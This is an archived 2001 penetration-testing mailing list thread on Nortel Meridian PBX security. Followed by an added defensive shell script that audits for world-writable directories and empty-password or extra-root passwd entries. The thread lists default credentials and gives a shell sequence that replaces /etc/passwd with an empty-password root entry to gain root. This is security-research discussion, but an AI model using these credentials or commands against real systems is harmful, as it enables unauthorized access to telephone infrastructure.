Penetration Testing mailing list archives

Re: Nortel Security


From: H D Moore <hdm () secureaustin com>
Date: Sat, 30 Jun 2001 12:54:05 -0500

If the PBX is hooked into the actual network, there are quite a few ways to 
get access to the system.  The easiest method is to tftp the /etc/passwd file 
off the system and crack the hashes.  If you go this route, you will get a 
user account called "service" with a password of "smile" ;)  If you log into 
the system with this account, you will notice that /etc is mode 0777, so 
getting root access is trivial:

$ echo "root::0:0:root:/root:/bin/sh" > /etc/mah_passwd
$ mv /etc/passwd /etc/passwd.bak
$ mv /etc/mah_passwd /etc/passwd
$ su root
# mv /etc/passwd.bak /etc/passwd

I don't remember which version of this system it was, but the client software 
that came with it was called "Meridian Terminal Emulator".  You could manage 
the PBX with this by first logging in with 0000/0000 then giving it the 
manager password of "9999".  I really wish I had more time to write up the 
stuff I find out there... 

-HD


On Saturday 30 June 2001 06:22 am, G A Evans wrote:
Try

http://support.dialogic.com/

and search for meridian. There is quite a bit of programming information.

You can also try a login of 0000 and password of 0000 for the Nortel
Meridian 1 PBX OS Release 2.

Tony Barnett

abarnettremovethisbit () ndirect co uk

--------------------------------------------------------------------------------------

This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service
For more information on SecurityFocus' SIA service which automatically alerts you to 
the latest security vulnerabilities please see:

https://alerts.securityfocus.com/
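
Added example, not part of the original post or the list: a shell audit for the two conditions the message relies on, a world-writable /etc and a passwd entry with an empty password field. The function names and the sample passwd content are constructed for illustration.

```shell
#!/bin/sh
# Added example: checks for a world-writable config directory and for
# passwd entries that allow login without a password.

# Print how exposed DIR is to unprivileged users:
#   swap   - world-writable, no sticky bit: any user can rename or replace
#            files in it, whatever the mode of the files themselves
#   create - world-writable with sticky bit: any user can add files
#   ok     - not world-writable
dir_write_risk() {
    if [ -n "$(find "$1" -prune -perm -0002 ! -perm -1000 2>/dev/null)" ]; then
        echo swap
    elif [ -n "$(find "$1" -prune -perm -0002 2>/dev/null)" ]; then
        echo create
    else
        echo ok
    fi
}

# Print one finding per line for a passwd-format FILE:
# accounts with an empty password field, and UID 0 accounts not named root.
passwd_findings() {
    awk -F: '
        /^#/ || NF < 3          { next }
        $2 == ""                { print "empty-password:" $1 }
        $3 == 0 && $1 != "root" { print "extra-uid0:" $1 }
    ' "$1"
}

# Constructed sample input (not taken from any real system).
sample_passwd() {
    cat <<'EOF'
root::0:0:root:/root:/bin/sh
service:x:100:100:service:/home/service:/bin/sh
toor:x:0:0:alt:/root:/bin/sh
EOF
}

# Run both checks against a throwaway directory holding the sample file.
demo() {
    d=$(mktemp -d) && chmod 0777 "$d" && sample_passwd > "$d/passwd"
    echo "dir: $(dir_write_risk "$d")"
    passwd_findings "$d/passwd"
    rm -rf "$d"
}
demo
```

On a real host, call dir_write_risk /etc and passwd_findings /etc/passwd; anything other than "ok" and an empty findings list needs attention.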

